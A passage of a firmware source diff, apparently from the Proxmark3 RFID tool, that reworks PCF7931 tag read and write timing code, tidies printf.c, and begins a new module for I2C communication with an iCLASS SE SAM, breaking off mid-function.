-                if (bitidx == 128) {
+                // Dbprintf(_YELLOW_("Block Done") " bitPos: %d, sample: %d", bitPos, sample);
+
+                // check if it is a complete block. If bitpos <128, it means that we did not receive
+                // a complete block. E.g. at the first start of a transmission.
+                // only save if a complete block is being received.
+                if (bitPos == 128) {
                     for (j = 0; j < 16; ++j) {
                         blocks[num_blocks][j] =
                             128 * bits[j * 8 + 7] +
@@ -141,24 +187,25 @@ size_t DemodPCF7931(uint8_t **outBlocks, bool ledcontrol) {
                     }
                     num_blocks++;
                 }
-                bitidx = 0;
+                // now start over for the next block / first complete block.
+                bitPos = 0;
                 block_done = 0;
                 half_switch = 0;
             }
 
-            if (i < g_GraphTraceLen) {
-                dir = (dest[i - 1] > dest[i]) ? 0 : 1;
-            }
+        } else {
+            // Dbprintf("%d, %d", sample, dest[sample]);
         }
 
-        if (bitidx == 255) {
-            bitidx = 0;
+        // one block only holds 16byte (=128 bit) and then comes the PMC. so if more bit are found than 129, there must be an issue and PMC has not been identfied...
+        // TODO: not sure what to do in such case...
+        if (bitPos >= 129) {
+            Dbprintf(_RED_("PMC should have been found...") " bitPos: %d, sample: %d", bitPos, sample);
+            bitPos = 0;
         }
 
-        if (num_blocks == 4) {
-            break;
-        }
     }
+
     memcpy(outBlocks, blocks, 16 * num_blocks);
     return num_blocks;
 }
@@ -204,25 +251,32 @@ bool IsBlock1PCF7931(const uint8_t *block) {
 }
 
 void ReadPCF7931(bool ledcontrol) {
+
+    uint8_t maxBlocks = 8;   // readable blocks
     int found_blocks = 0; // successfully read blocks
-    int max_blocks = 8;   // readable blocks
-    uint8_t memory_blocks[8][17]; // PCF content
-    uint8_t single_blocks[8][17]; // PFC blocks with unknown position
+
+    // TODO: Why 17 byte len? 16 should be good.
+    uint8_t memory_blocks[maxBlocks][17]; // PCF content
+    uint8_t single_blocks[maxBlocks][17]; // PFC blocks with unknown position
+    uint8_t tmp_blocks[4][16]; // temporary read buffer
+
     int single_blocks_cnt = 0;
 
     size_t n; // transmitted blocks
-    uint8_t tmp_blocks[4][16]; // temporary read buffer
 
-    uint8_t found_0_1 = 0; // flag: blocks 0 and 1 were found
+    //uint8_t found_0_1 = 0; // flag: blocks 0 and 1 were found
     int errors = 0; // error counter
     int tries = 0; // tries counter
 
+    // reuse lenghts and consts to properly clear
     memset(memory_blocks, 0, 8 * 17 * sizeof(uint8_t));
     memset(single_blocks, 0, 8 * 17 * sizeof(uint8_t));
 
-    int i = 0, j = 0;
+    int i = 0;
+    //j = 0;
 
     do {
+        Dbprintf("ReadPCF7931() -- Reading Loop ==========");
         i = 0;
 
         memset(tmp_blocks, 0, 4 * 16 * sizeof(uint8_t));
@@ -232,15 +286,13 @@ void ReadPCF7931(bool ledcontrol) {
 
         // exit if no block is received
         if (errors >= 10 && found_blocks == 0 && single_blocks_cnt == 0) {
-
-            if (g_dbglevel >= DBG_INFO)
-                Dbprintf("[!!] Error, no tag or bad tag");
-
+            Dbprintf("[!!] Error, no tag or bad tag");
             return;
         }
-        // exit if too many errors during reading
-        if (tries > 50 && (2 * errors > tries)) {
+        // exit if too many tries without finding the first block
+        if (tries > 10) {
 
+            Dbprintf("End after 10 tries");
             if (g_dbglevel >= DBG_INFO) {
                 Dbprintf("[!!] Error reading the tag, only partial content");
             }
@@ -248,93 +300,98 @@ void ReadPCF7931(bool ledcontrol) {
             goto end;
         }
 
-        // our logic breaks if we don't get at least two blocks
-        if (n < 2) {
-            // skip if all 0s block or no blocks
-            if (n == 0 || !memcmp(tmp_blocks[0], "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16))
-                continue;
+        // This part was not working properly.
+        // So currently the blocks are not being sorted, but at least printed.
 
-            // add block to single blocks list
-            if (single_blocks_cnt < max_blocks) {
-                for (i = 0; i < single_blocks_cnt; ++i) {
-                    if (!memcmp(single_blocks[i], tmp_blocks[0], 16)) {
-                        j = 1;
-                        break;
-                    }
-                }
-                if (j != 1) {
-                    memcpy(single_blocks[single_blocks_cnt], tmp_blocks[0], 16);
-                    print_result("got single block", single_blocks[single_blocks_cnt], 16);
-                    single_blocks_cnt++;
-                }
-                j = 0;
-            }
-            ++tries;
-            continue;
-        }
+        // // our logic breaks if we don't get at least two blocks
+        // if (n < 2) {
+        //     // skip if all 0s block or no blocks
+        //     if (n == 0 || !memcmp(tmp_blocks[0], "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16))
+        //         continue;
 
-        if (g_dbglevel >= DBG_EXTENDED)
-            Dbprintf("(dbg) got %d blocks (%d/%d found) (%d tries, %d errors)", n, found_blocks, (max_blocks == 0 ? found_blocks : max_blocks), tries, errors);
+        //     // add block to single blocks list
+        //     if (single_blocks_cnt < maxBlocks) {
+        //         for (i = 0; i < single_blocks_cnt; ++i) {
+        //             if (!memcmp(single_blocks[i], tmp_blocks[0], 16)) {
+        //                 j = 1;
+        //                 break;
+        //             }
+        //         }
+        //         if (j != 1) {
+        //             memcpy(single_blocks[single_blocks_cnt], tmp_blocks[0], 16);
+        //             print_result("got single block", single_blocks[single_blocks_cnt], 16);
+        //             single_blocks_cnt++;
+        //         }
+        //         j = 0;
+        //     }
+        //     ++tries;
+        //     continue;
+        // }
 
+        // Dbprintf("(dbg) got %d blocks (%d/%d found) (%d tries, %d errors)", n, found_blocks, (maxBlocks == 0 ? found_blocks : maxBlocks), tries, errors);
+        // if (g_dbglevel >= DBG_EXTENDED)
+        //     Dbprintf("(dbg) got %d blocks (%d/%d found) (%d tries, %d errors)", n, found_blocks, (maxBlocks == 0 ? found_blocks : maxBlocks), tries, errors);
+
+        // print blocks that have been found
         for (i = 0; i < n; ++i) {
-            print_result("got consecutive blocks", tmp_blocks[i], 16);
+            print_result("Block found: ", tmp_blocks[i], 16);
         }
 
-        i = 0;
-        if (!found_0_1) {
-            while (i < n - 1) {
-                if (IsBlock0PCF7931(tmp_blocks[i]) && IsBlock1PCF7931(tmp_blocks[i + 1])) {
-                    found_0_1 = 1;
-                    memcpy(memory_blocks[0], tmp_blocks[i], 16);
-                    memcpy(memory_blocks[1], tmp_blocks[i + 1], 16);
-                    memory_blocks[0][ALLOC] = memory_blocks[1][ALLOC] = 1;
-                    // block 1 tells how many blocks are going to be sent
-                    max_blocks = MAX((memory_blocks[1][14] & 0x7f), memory_blocks[1][15]) + 1;
-                    found_blocks = 2;
+        // i = 0;
+        // if (!found_0_1) {
+        //     while (i < n - 1) {
+        //         if (IsBlock0PCF7931(tmp_blocks[i]) && IsBlock1PCF7931(tmp_blocks[i + 1])) {
+        //             found_0_1 = 1;
+        //             memcpy(memory_blocks[0], tmp_blocks[i], 16);
+        //             memcpy(memory_blocks[1], tmp_blocks[i + 1], 16);
+        //             memory_blocks[0][ALLOC] = memory_blocks[1][ALLOC] = 1;
+        //             // block 1 tells how many blocks are going to be sent
+        //             maxBlocks = MAX((memory_blocks[1][14] & 0x7f), memory_blocks[1][15]) + 1;
+        //             found_blocks = 2;
 
-                    Dbprintf("Found blocks 0 and 1. PCF is transmitting %d blocks.", max_blocks);
+        //             Dbprintf("Found blocks 0 and 1. PCF is transmitting %d blocks.", maxBlocks);
 
-                    // handle the following blocks
-                    for (j = i + 2; j < n; ++j) {
-                        memcpy(memory_blocks[found_blocks], tmp_blocks[j], 16);
-                        memory_blocks[found_blocks][ALLOC] = 1;
-                        ++found_blocks;
-                    }
-                    break;
-                }
-                ++i;
-            }
-        } else {
-            // Trying to re-order blocks
-            // Look for identical block in memory blocks
-            while (i < n - 1) {
-                // skip all zeroes blocks
-                if (memcmp(tmp_blocks[i], "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16)) {
-                    for (j = 1; j < max_blocks - 1; ++j) {
-                        if (!memcmp(tmp_blocks[i], memory_blocks[j], 16) && !memory_blocks[j + 1][ALLOC]) {
-                            memcpy(memory_blocks[j + 1], tmp_blocks[i + 1], 16);
-                            memory_blocks[j + 1][ALLOC] = 1;
-                            if (++found_blocks >= max_blocks) goto end;
-                        }
-                    }
-                }
-                if (memcmp(tmp_blocks[i + 1], "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16)) {
-                    for (j = 0; j < max_blocks; ++j) {
-                        if (!memcmp(tmp_blocks[i + 1], memory_blocks[j], 16) && !memory_blocks[(j == 0 ? max_blocks : j) - 1][ALLOC]) {
-                            if (j == 0) {
-                                memcpy(memory_blocks[max_blocks - 1], tmp_blocks[i], 16);
-                                memory_blocks[max_blocks - 1][ALLOC] = 1;
-                            } else {
-                                memcpy(memory_blocks[j - 1], tmp_blocks[i], 16);
-                                memory_blocks[j - 1][ALLOC] = 1;
-                            }
-                            if (++found_blocks >= max_blocks) goto end;
-                        }
-                    }
-                }
-                ++i;
-            }
-        }
+        //             // handle the following blocks
+        //             for (j = i + 2; j < n; ++j) {
+        //                 memcpy(memory_blocks[found_blocks], tmp_blocks[j], 16);
+        //                 memory_blocks[found_blocks][ALLOC] = 1;
+        //                 ++found_blocks;
+        //             }
+        //             break;
+        //         }
+        //         ++i;
+        //     }
+        // } else {
+        //     // Trying to re-order blocks
+        //     // Look for identical block in memory blocks
+        //     while (i < n - 1) {
+        //         // skip all zeroes blocks
+        //         if (memcmp(tmp_blocks[i], "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16)) {
+        //             for (j = 1; j < maxBlocks - 1; ++j) {
+        //                 if (!memcmp(tmp_blocks[i], memory_blocks[j], 16) && !memory_blocks[j + 1][ALLOC]) {
+        //                     memcpy(memory_blocks[j + 1], tmp_blocks[i + 1], 16);
+        //                     memory_blocks[j + 1][ALLOC] = 1;
+        //                     if (++found_blocks >= maxBlocks) goto end;
+        //                 }
+        //             }
+        //         }
+        //         if (memcmp(tmp_blocks[i + 1], "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 16)) {
+        //             for (j = 0; j < maxBlocks; ++j) {
+        //                 if (!memcmp(tmp_blocks[i + 1], memory_blocks[j], 16) && !memory_blocks[(j == 0 ? maxBlocks : j) - 1][ALLOC]) {
+        //                     if (j == 0) {
+        //                         memcpy(memory_blocks[maxBlocks - 1], tmp_blocks[i], 16);
+        //                         memory_blocks[maxBlocks - 1][ALLOC] = 1;
+        //                     } else {
+        //                         memcpy(memory_blocks[j - 1], tmp_blocks[i], 16);
+        //                         memory_blocks[j - 1][ALLOC] = 1;
+        //                     }
+        //                     if (++found_blocks >= maxBlocks) goto end;
+        //                 }
+        //             }
+        //         }
+        //         ++i;
+        //     }
+        // }
         ++tries;
         if (BUTTON_PRESS()) {
             if (g_dbglevel >= DBG_EXTENDED)
@@ -342,62 +399,79 @@ void ReadPCF7931(bool ledcontrol) {
 
             goto end;
         }
-    } while (found_blocks < max_blocks);
+    } while (found_blocks < maxBlocks);
+
 
 end:
-    Dbprintf("-----------------------------------------");
-    Dbprintf("Memory content:");
-    Dbprintf("-----------------------------------------");
-    for (i = 0; i < max_blocks; ++i) {
-        if (memory_blocks[i][ALLOC])
-            print_result("Block", memory_blocks[i], 16);
-        else
-            Dbprintf("<missing block %d>", i);
-    }
-    Dbprintf("-----------------------------------------");
+    /*
+        Dbprintf("-----------------------------------------");
+        Dbprintf("Memory content:");
+        Dbprintf("-----------------------------------------");
+        for (i = 0; i < maxBlocks; ++i) {
+            if (memory_blocks[i][ALLOC])
+                print_result("Block", memory_blocks[i], 16);
+            else
+                Dbprintf("<missing block %d>", i);
+        }
+        Dbprintf("-----------------------------------------");
 
-    if (found_blocks < max_blocks) {
-        Dbprintf("-----------------------------------------");
-        Dbprintf("Blocks with unknown position:");
-        Dbprintf("-----------------------------------------");
-        for (i = 0; i < single_blocks_cnt; ++i)
-            print_result("Block", single_blocks[i], 16);
+        if (found_blocks < maxBlocks) {
+            Dbprintf("-----------------------------------------");
+            Dbprintf("Blocks with unknown position:");
+            Dbprintf("-----------------------------------------");
+            for (i = 0; i < single_blocks_cnt; ++i)
+                print_result("Block", single_blocks[i], 16);
+
+            Dbprintf("-----------------------------------------");
+        }
+    */
 
-        Dbprintf("-----------------------------------------");
-    }
     reply_mix(CMD_ACK, 0, 0, 0, 0, 0);
 }
 
-static void RealWritePCF7931(uint8_t *pass, uint16_t init_delay, int32_t l, int32_t p, uint8_t address, uint8_t byte, uint8_t data, bool ledcontrol) {
+static void RealWritePCF7931(
+    uint8_t *pass,
+    uint16_t init_delay,
+    int8_t offsetPulseWidth, int8_t offsetPulsePosition,
+    uint8_t address, uint8_t byte, uint8_t data,
+    bool ledcontrol) {
+
     uint32_t tab[1024] = {0}; // data times frame
     uint32_t u = 0;
     uint8_t parity = 0;
-    bool comp = 0;
 
     //BUILD OF THE DATA FRAME
     //alimentation of the tag (time for initializing)
+    // ToDo: This could be optimized/automated. e.g. Read one cycle, find PMC and calculate time.
+    // I dont understand, why 8192/2
     AddPatternPCF7931(init_delay, 0, 8192 / 2 * T0_PCF, tab);
+
+    // why "... + 70"? Why not "... + x * T0"?
+    // I think he just added 70 to be somewhere in The PMC window, which is 32T0 (=32*8 = 256)
+    // 3*T0 = PMC width
+    // 29*T0 = rest of PMC window (total 32T0 = 3+29)
+    // after the PMC, it directly goes to the password indication bit.
     AddPatternPCF7931(8192 / 2 * T0_PCF + 319 * T0_PCF + 70, 3 * T0_PCF, 29 * T0_PCF, tab);
     //password indication bit
-    AddBitPCF7931(1, tab, l, p);
+    AddBitPCF7931(1, tab, offsetPulseWidth, offsetPulsePosition);
     //password (on 56 bits)
-    AddBytePCF7931(pass[0], tab, l, p);
-    AddBytePCF7931(pass[1], tab, l, p);
-    AddBytePCF7931(pass[2], tab, l, p);
-    AddBytePCF7931(pass[3], tab, l, p);
-    AddBytePCF7931(pass[4], tab, l, p);
-    AddBytePCF7931(pass[5], tab, l, p);
-    AddBytePCF7931(pass[6], tab, l, p);
-    //programming mode (0 or 1)
-    AddBitPCF7931(0, tab, l, p);
+    AddBytePCF7931(pass[0], tab, offsetPulseWidth, offsetPulsePosition);
+    AddBytePCF7931(pass[1], tab, offsetPulseWidth, offsetPulsePosition);
+    AddBytePCF7931(pass[2], tab, offsetPulseWidth, offsetPulsePosition);
+    AddBytePCF7931(pass[3], tab, offsetPulseWidth, offsetPulsePosition);
+    AddBytePCF7931(pass[4], tab, offsetPulseWidth, offsetPulsePosition);
+    AddBytePCF7931(pass[5], tab, offsetPulseWidth, offsetPulsePosition);
+    AddBytePCF7931(pass[6], tab, offsetPulseWidth, offsetPulsePosition);
+    //programming mode (0 or 1) -> 0 = byte wise; 1 = block wise programming
+    AddBitPCF7931(0, tab, offsetPulseWidth, offsetPulsePosition);
 
     //block address on 6 bits
     for (u = 0; u < 6; ++u) {
         if (address & (1 << u)) { // bit 1
             ++parity;
-            AddBitPCF7931(1, tab, l, p);
+            AddBitPCF7931(1, tab, offsetPulseWidth, offsetPulsePosition);
         } else {              // bit 0
-            AddBitPCF7931(0, tab, l, p);
+            AddBitPCF7931(0, tab, offsetPulseWidth, offsetPulsePosition);
         }
     }
 
@@ -405,56 +479,48 @@ static void RealWritePCF7931(uint8_t *pass, uint16_t init_delay, int32_t l, int3
     for (u = 0; u < 4; ++u) {
         if (byte & (1 << u)) { // bit 1
             parity++;
-            AddBitPCF7931(1, tab, l, p);
+            AddBitPCF7931(1, tab, offsetPulseWidth, offsetPulsePosition);
         } else                // bit 0
-            AddBitPCF7931(0, tab, l, p);
+            AddBitPCF7931(0, tab, offsetPulseWidth, offsetPulsePosition);
     }
 
     //data on 8 bits
     for (u = 0; u < 8; u++) {
         if (data & (1 << u)) { // bit 1
             parity++;
-            AddBitPCF7931(1, tab, l, p);
+            AddBitPCF7931(1, tab, offsetPulseWidth, offsetPulsePosition);
         } else                //bit 0
-            AddBitPCF7931(0, tab, l, p);
+            AddBitPCF7931(0, tab, offsetPulseWidth, offsetPulsePosition);
     }
 
     //parity bit
     if ((parity % 2) == 0)
-        AddBitPCF7931(0, tab, l, p); //even parity
+        AddBitPCF7931(0, tab, offsetPulseWidth, offsetPulsePosition); //even parity
     else
-        AddBitPCF7931(1, tab, l, p);//odd parity
+        AddBitPCF7931(1, tab, offsetPulseWidth, offsetPulsePosition);//odd parity
 
-    //time access memory
-    AddPatternPCF7931(5120 + 2680, 0, 0, tab);
-
-    //conversion of the scale time
-    for (u = 0; u < 500; ++u)
-        tab[u] = (tab[u] * 3) / 2;
-
-    //compensation of the counter reload
-    while (!comp) {
-        comp = 1;
-        for (u = 0; tab[u] != 0; ++u)
-            if (tab[u] > 0xFFFF) {
-                tab[u] -= 0xFFFF;
-                comp = 0;
-            }
-    }
+    // time access memory (640T0)
+    // Not sure why 335*T0, but should not matter. Since programming should be finished at that point
+    AddPatternPCF7931((640 + 335)* T0_PCF, 0, 0, tab);
 
     SendCmdPCF7931(tab, ledcontrol);
 }
 
 /* Write on a byte of a PCF7931 tag
  * @param address : address of the block to write
-   @param byte : address of the byte to write
-    @param data : data to write
+ * @param byte : address of the byte to write
+ * @param data : data to write
  */
-void WritePCF7931(uint8_t pass1, uint8_t pass2, uint8_t pass3, uint8_t pass4, uint8_t pass5, uint8_t pass6, uint8_t pass7, uint16_t init_delay, int32_t l, int32_t p, uint8_t address, uint8_t byte, uint8_t data, bool ledcontrol) {
+void WritePCF7931(
+    uint8_t pass1, uint8_t pass2, uint8_t pass3, uint8_t pass4, uint8_t pass5, uint8_t pass6, uint8_t pass7,
+    uint16_t init_delay,
+    int8_t offsetPulseWidth, int8_t offsetPulsePosition,
+    uint8_t address, uint8_t byte, uint8_t data,
+    bool ledcontrol) {
 
     if (g_dbglevel >= DBG_INFO) {
         Dbprintf("Initialization delay : %d us", init_delay);
-        Dbprintf("Offsets : %d us on the low pulses width, %d us on the low pulses positions", l, p);
+        Dbprintf("Offsets : %d us on the low pulses width, %d us on the low pulses positions", offsetPulseWidth, offsetPulsePosition);
     }
 
     Dbprintf("Password (LSB first on each byte): %02x %02x %02x %02x %02x %02x %02x", pass1, pass2, pass3, pass4, pass5, pass6, pass7);
@@ -464,15 +530,15 @@ void WritePCF7931(uint8_t pass1, uint8_t pass2, uint8_t pass3, uint8_t pass4, ui
 
     uint8_t password[7] = {pass1, pass2, pass3, pass4, pass5, pass6, pass7};
 
-    RealWritePCF7931(password, init_delay, l, p, address, byte, data, ledcontrol);
+    RealWritePCF7931(password, init_delay, offsetPulseWidth, offsetPulsePosition, address, byte, data, ledcontrol);
 }
 
 
-/* Send a trame to a PCF7931 tags
+/* Send a frame to a PCF7931 tags
  * @param tab : array of the data frame
  */
 
-void SendCmdPCF7931(const uint32_t *tab, bool ledcontrol) {
+void SendCmdPCF7931(uint32_t *tab, bool ledcontrol) {
     uint16_t u = 0, tempo = 0;
 
     if (g_dbglevel >= DBG_INFO) {
@@ -485,6 +551,20 @@ void SendCmdPCF7931(const uint32_t *tab, bool ledcontrol) {
 
     if (ledcontrol) LED_A_ON();
 
+    // rescale the values to match the time of the timer below.
+    for (u = 0; u < 500; ++u) {
+        tab[u] = (tab[u] * 3) / 2;
+    }
+
+    // compensation for the counter overflow
+    // only one overflow should be possible.
+    for (u = 0; tab[u] != 0; ++u)
+        if (tab[u] > 0xFFFF) {
+            tab[u] -= 0xFFFF;
+            break;
+        }
+
+
     // steal this pin from the SSP and use it to control the modulation
     AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT;
     AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT;
@@ -493,7 +573,7 @@ void SendCmdPCF7931(const uint32_t *tab, bool ledcontrol) {
     AT91C_BASE_PMC->PMC_PCER |= (0x1 << AT91C_ID_TC0);
     AT91C_BASE_TCB->TCB_BMR = AT91C_TCB_TC0XC0S_NONE | AT91C_TCB_TC1XC1S_TIOA0 | AT91C_TCB_TC2XC2S_NONE;
     AT91C_BASE_TC0->TC_CCR = AT91C_TC_CLKDIS;                 // timer disable
-    AT91C_BASE_TC0->TC_CMR = AT91C_TC_CLKS_TIMER_DIV3_CLOCK;  // clock at 48/32 MHz
+    AT91C_BASE_TC0->TC_CMR = AT91C_TC_CLKS_TIMER_DIV3_CLOCK;  // clock at 48/32 MHz (48Mhz clock, 32 = prescaler (div3))
     AT91C_BASE_TC0->TC_CCR = AT91C_TC_CLKEN;
 
     // Assert a sync signal. This sets all timers to 0 on next active clock edge
@@ -503,19 +583,19 @@ void SendCmdPCF7931(const uint32_t *tab, bool ledcontrol) {
     for (u = 0; tab[u] != 0; u += 3) {
         // modulate antenna
         HIGH(GPIO_SSC_DOUT);
-        while (tempo != tab[u]) {
+        while ((uint32_t)tempo < tab[u]) {
             tempo = AT91C_BASE_TC0->TC_CV;
         }
 
         // stop modulating antenna
         LOW(GPIO_SSC_DOUT);
-        while (tempo != tab[u + 1]) {
+        while ((uint32_t)tempo < tab[u + 1]) {
             tempo = AT91C_BASE_TC0->TC_CV;
         }
 
         // modulate antenna
         HIGH(GPIO_SSC_DOUT);
-        while (tempo != tab[u + 2]) {
+        while ((uint32_t)tempo < tab[u + 2]) {
             tempo = AT91C_BASE_TC0->TC_CV;
         }
     }
@@ -528,32 +608,36 @@ void SendCmdPCF7931(const uint32_t *tab, bool ledcontrol) {
 }
 
 
-/* Add a byte for building the data frame of PCF7931 tags
+/* Add a byte for building the data frame of PCF7931 tags.
+ * See Datasheet of PCF7931 diagramm on page 8. This explains pulse widht & positioning
+ * Normally, no offset should be required.
  * @param b : byte to add
  * @param tab : array of the data frame
- * @param l : offset on low pulse width
- * @param p : offset on low pulse positioning
+ * @param offsetPulseWidth : offset on low pulse width in µs (default pulse widht is 6T0)
+ * @param offsetPulsePosition : offset on low pulse positioning in µs
  */
-bool AddBytePCF7931(uint8_t byte, uint32_t *tab, int32_t l, int32_t p) {
+bool AddBytePCF7931(uint8_t byte, uint32_t *tab, int8_t offsetPulseWidth, int8_t offsetPulsePosition) {
     uint32_t u;
     for (u = 0; u < 8; ++u) {
         if (byte & (1 << u)) { //bit is 1
-            if (AddBitPCF7931(1, tab, l, p) == 1) return true;
+            AddBitPCF7931(1, tab, offsetPulseWidth, offsetPulsePosition);
         } else { //bit is 0
-            if (AddBitPCF7931(0, tab, l, p) == 1) return true;
+            AddBitPCF7931(0, tab, offsetPulseWidth, offsetPulsePosition);
         }
     }
 
     return false;
 }
 
-/* Add a bits for building the data frame of PCF7931 tags
+/* Add a bits for building the data frame of PCF7931 tags.
+ * See Datasheet of PCF7931 diagramm on page 8. This explains pulse widht & positioning
+ * Normally, no offset should be required.
  * @param b : bit to add
  * @param tab : array of the data frame
- * @param l : offset on low pulse width
- * @param p : offset on low pulse positioning
+ * @param offsetPulseWidth : offset on low pulse width in µs (default pulse widht is 6T0)
+ * @param offsetPulsePosition : offset on low pulse positioning in µs
  */
-bool AddBitPCF7931(bool b, uint32_t *tab, int32_t l, int32_t p) {
+bool AddBitPCF7931(bool b, uint32_t *tab, int8_t offsetPulseWidth, int8_t offsetPulsePosition) {
     uint8_t u = 0;
 
     //we put the cursor at the last value of the array
@@ -561,23 +645,22 @@ bool AddBitPCF7931(bool b, uint32_t *tab, int32_t l, int32_t p) {
 
     if (b == 1) {   //add a bit 1
         if (u == 0)
-            tab[u] = 34 * T0_PCF + p;
+            tab[u] = 34 * T0_PCF + offsetPulsePosition;
         else
-            tab[u] = 34 * T0_PCF + tab[u - 1] + p;
+            tab[u] = 34 * T0_PCF + tab[u - 1] + offsetPulsePosition;
+
+        tab[u + 1] =  6 * T0_PCF + tab[u] + offsetPulseWidth;
+        tab[u + 2] = 88 * T0_PCF + tab[u + 1] - offsetPulseWidth - offsetPulsePosition;
 
-        tab[u + 1] =  6 * T0_PCF + tab[u] + l;
-        tab[u + 2] = 88 * T0_PCF + tab[u + 1] - l - p;
-        return false;
     } else { //add a bit 0
-
         if (u == 0)
-            tab[u] = 98 * T0_PCF + p;
+            tab[u] = 98 * T0_PCF + offsetPulsePosition;
         else
-            tab[u] = 98 * T0_PCF + tab[u - 1] + p;
+            tab[u] = 98 * T0_PCF + tab[u - 1] + offsetPulsePosition;
+
+        tab[u + 1] =  6 * T0_PCF + tab[u] + offsetPulseWidth;
+        tab[u + 2] = 24 * T0_PCF + tab[u + 1] - offsetPulseWidth - offsetPulsePosition;
 
-        tab[u + 1] =  6 * T0_PCF + tab[u] + l;
-        tab[u + 2] = 24 * T0_PCF + tab[u + 1] - l - p;
-        return false;
     }
     return true;
 }
@@ -592,8 +675,8 @@ bool AddPatternPCF7931(uint32_t a, uint32_t b, uint32_t c, uint32_t *tab) {
     uint32_t u = 0;
     for (u = 0; tab[u] != 0; u += 3) {} //we put the cursor at the last value of the array
 
-    tab[u]   = (u == 0) ? a : a + tab[u - 1];
-    tab[u + 1] = b + tab[u];
+    tab[u]   = (u == 0) ? a : a + tab[u - 1];   // if it is the first value of the array, nothing needs to be added.
+    tab[u + 1] = b + tab[u];                    // otherwise always add up the values, because later on it is compared to a counter
     tab[u + 2] = c + tab[u + 1];
 
     return true;

armsrc/pcf7931.h

@@ -18,14 +18,20 @@
 
 #include "common.h"
 
+
+typedef enum {
+    FALLING,
+    RISING
+} EdgeType;
+
 size_t DemodPCF7931(uint8_t **outBlocks, bool ledcontrol);
 bool IsBlock0PCF7931(uint8_t *block);
 bool IsBlock1PCF7931(const uint8_t *block);
 void ReadPCF7931(bool ledcontrol);
-void SendCmdPCF7931(const uint32_t *tab, bool ledcontrol);
-bool AddBytePCF7931(uint8_t byte, uint32_t *tab, int32_t l, int32_t p);
-bool AddBitPCF7931(bool b, uint32_t *tab, int32_t l, int32_t p);
+void SendCmdPCF7931(uint32_t *tab, bool ledcontrol);
+bool AddBytePCF7931(uint8_t byte, uint32_t *tab, int8_t offsetPulseWidth, int8_t offsetPulsePosition);
+bool AddBitPCF7931(bool b, uint32_t *tab, int8_t offsetPulseWidth, int8_t offsetPulsePosition);
 bool AddPatternPCF7931(uint32_t a, uint32_t b, uint32_t c, uint32_t *tab);
-void WritePCF7931(uint8_t pass1, uint8_t pass2, uint8_t pass3, uint8_t pass4, uint8_t pass5, uint8_t pass6, uint8_t pass7, uint16_t init_delay, int32_t l, int32_t p, uint8_t address, uint8_t byte, uint8_t data, bool ledcontrol);
+void WritePCF7931(uint8_t pass1, uint8_t pass2, uint8_t pass3, uint8_t pass4, uint8_t pass5, uint8_t pass6, uint8_t pass7, uint16_t init_delay, int8_t offsetPulseWidth, int8_t offsetPulsePosition, uint8_t address, uint8_t byte, uint8_t data, bool ledcontrol);
 
 #endif

armsrc/printf.c

@@ -104,11 +104,13 @@ kvsprintf(char const *fmt, void *arg, int radix, va_list ap) {
     num = 0;
     d = (char *) arg;
 
-    if (fmt == NULL)
+    if (fmt == NULL) {
         fmt = "(fmt null)\n";
+    }
 
-    if (radix < 2 || radix > 36)
+    if (radix < 2 || radix > 36) {
         radix = 10;
+    }
 
     for (;;) {
         padc = ' ';

armsrc/sam_common.c

@@ -0,0 +1,515 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// Routines to support MFC <-> SAM communication
+//-----------------------------------------------------------------------------
+
+
+#include <string.h>
+#include "sam_common.h"
+#include "iclass.h"
+#include "proxmark3_arm.h"
+#include "BigBuf.h"
+#include "commonutil.h"
+#include "ticks.h"
+#include "dbprint.h"
+#include "i2c.h"
+#include "iso15693.h"
+#include "protocols.h"
+
+
+/**
+ * @brief Transmits data to and receives data from a HID®'s iCLASS® SE™ Processor.
+ *
+ * This function sends a specified number of bytes to the SAM and receives a response.
+ *
+ * @param data Pointer to the data to be transmitted.
+ * @param n Number of bytes to be transmitted.
+ * @param resp Pointer to the buffer where the response will be stored.
+ * @param resplen Pointer to the variable where the length of the response will be stored.
+ * @return Status code indicating success or failure of the operation.
+ */
+int sam_rxtx(const uint8_t *data, uint16_t n, uint8_t *resp, uint16_t *resplen) {
+    bool res = I2C_BufferWrite(data, n, I2C_DEVICE_CMD_SEND_T0, I2C_DEVICE_ADDRESS_MAIN);
+    if (res == false) {
+        DbpString("failed to send to SIM CARD");
+        goto out;
+    }
+
+    *resplen = ISO7816_MAX_FRAME;
+
+    res = sc_rx_bytes(resp, resplen, SIM_WAIT_DELAY);
+    if (res == false) {
+        DbpString("failed to receive from SIM CARD");
+        goto out;
+    }
+
+    if (*resplen < 2) {
+        DbpString("received too few bytes from SIM CARD");
+        res = false;
+        goto out;
+    }
+
+    uint16_t more_len = 0;
+
+    if (resp[*resplen - 2] == 0x61 || resp[*resplen - 2] == 0x9F) {
+        more_len = resp[*resplen - 1];
+    } else {
+        // we done, return
+        goto out;
+    }
+
+    // Don't discard data we already received except the SW code.
+    // If we only received 1 byte, this is the echo of INS, we discard it.
+    *resplen -= 2;
+    if (*resplen == 1) {
+        *resplen = 0;
+    }
+
+    uint8_t cmd_getresp[] = {0x00, ISO7816_GET_RESPONSE, 0x00, 0x00, more_len};
+
+    res = I2C_BufferWrite(cmd_getresp, sizeof(cmd_getresp), I2C_DEVICE_CMD_SEND_T0, I2C_DEVICE_ADDRESS_MAIN);
+    if (res == false) {
+        DbpString("failed to send to SIM CARD 2");
+        goto out;
+    }
+
+    more_len = 255 - *resplen;
+
